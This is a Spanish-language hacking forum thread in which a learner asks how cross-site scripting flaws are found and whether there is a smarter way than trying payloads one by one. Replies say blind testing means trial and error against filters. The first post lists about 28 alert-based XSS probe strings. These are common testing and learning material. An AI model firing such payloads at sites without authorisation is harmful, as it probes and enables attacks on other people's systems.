La única forma de encontrar XSS es probando ataques aleatorios?

Iniciado por elJuancho, 17 Diciembre 2015, 07:05 AM

0 Miembros y 1 Visitante están viendo este tema.

elJuancho

Buenas! Hay una duda que siempre tuve desde que arranque a leer artículos sobre XSS, todos muy informativos lo que quieran, pero en ningúno encontré explicaciones para saber como localizarlos... Es decir, hasta donde yo se el ataque XSS depende por completo de la parte PHP que se ejecuta en el servidor, si de alguna manera se pudiera leer el PHP que se ejecuta en el server, sería facil de saber como escaparse de los bloques.... Pero... En la vida real, qué tecnicas usan para encontrarlo? Hasta ahora la única forma que se es probando muchos ataques aleatoriamente como pueden ser éstos:

Código (html) [Seleccionar]
"><script>alert("XSS")</script>
"><script>alert(String.fromCharCode(88,83,83))</script>
'><script>alert("XSS")</script>
'><script>alert(String.fromCharCode(88,83,83))</script>
<ScRIPt>aLeRT("XSS")</ScRIPt>
<ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
"><ScRIPt>aLeRT("XSS")</ScRIPt>
"><ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
'><ScRIPt>aLeRT("XSS")</ScRIPt>
'><ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
</script><script>alert("XSS")</script>
</script><script>alert(String.fromCharCode(88,83,83))</script>
"/><script>alert("XSS")</script>
"/><script>alert(String.fromCharCode(88,83,83))</script>
'/><script>alert("XSS")</script>
'/><script>alert(String.fromCharCode(88,83,83))</script>
</SCRIPT>"><SCRIPT>alert("XSS")</SCRIPT>
</SCRIPT>"><SCRIPT>alert(String.fromCharCode(88,83,83))
</SCRIPT>">"><SCRIPT>alert("XSS")</SCRIPT>
</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
";alert("XSS");"
";alert(String.fromCharCode(88,83,83));"
';alert("XSS");'
';alert(String.fromCharCode(88,83,83));'
";alert("XSS")
";alert(String.fromCharCode(88,83,83))
';alert("XSS")
';alert(String.fromCharCode(88,83,83))


O usando algún programa que pruebe éstos ataques aleatoriamente por uno, como ser el XXSer por ejemplo.... Me gustaría que me dijeran qué técnicas usan ustedes para encontrarlos, si hay alguna forma más "inteligente" que simplemente probando ataques aleatoriamente... Y de paso si tienen algún pdf o cualquier clase de material que me ayuda a entender ésto y pueden aportarlo, sería muuuy bienvenido... Saludos y muchas gracias desde ya!

Shell Root

Al hacer un análisis sin el código fuente, se requiere siempre prueba y error, es decir: realizas un xss y miras el resultado, ves que caracteres son filtrados y empiezas a organizar el vector de ataque.
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

elJuancho

Genial shell Root! Me voy a poner a investigar más sobre los distintos tipos de filtrado de XSS... Muchas gracias y saludos!!!

WHK

Te recomiendo que comiences por aprender bastante sobre html y javascript, con eso tendras suficiente parasaber sacarle provecho a los xss y como saltar filtros.

Prueba el warzone: http://warzone.elhacker.net/